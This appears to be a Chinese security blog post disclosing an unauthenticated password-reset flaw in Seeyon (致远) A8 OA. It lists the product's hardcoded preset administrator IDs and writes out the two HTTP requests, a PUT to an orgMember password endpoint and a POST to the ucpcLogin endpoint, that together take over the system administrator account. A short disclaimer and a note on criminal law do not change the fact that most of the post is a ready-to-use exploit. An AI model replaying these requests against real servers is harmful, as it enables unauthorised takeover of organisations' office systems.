致远OA ucpcLogin密码重置漏洞

致远OA ucpcLogin密码重置漏洞

原创 丁永博 丁永博的成长日记 2024-03-26 23:59

致远A8 存在密码重置漏洞,未授权的攻击者在知道用户名的情况下,可以构造特制的请求包,从而修改用户密码,登录系统后台。

根据致远的手册可知,管理员的预制id

/**
     * 系统管理员预置ID
     * @deprecated 角色角色化后,废弃不再使用
     */
    public static final Long SYSTEM_ADMIN_ID = -7273032013234748168L;
    /**
     * 审计管理员预置ID
     * @deprecated 角色角色化后,废弃不再使用,8.1后可能删除
     */
    public static final Long AUDIT_ADMIN_ID = -4401606663639775639L;
    /**
     * 集团管理员预置ID
     * @deprecated 角色角色化后,废弃不再使用,8.1后可能删除
     */
    public static final Long GROUP_ADMIN_ID = 5725175934914479521L;

构造根据预制id数据包获取登录名

PUT /seeyon/rest/orgMember/-7273032013234748168/password/share.do HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=

构造数据包更改密码

POST /seeyon/rest/authentication/ucpcLogin?login_username=system&login_password=share.do&ticket= 

成功登录

批量检测包放知识星球

小知识

依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系统罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。

声明

本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。

欢迎 
在看

留言

分享至朋友圈
 三连

好文推荐****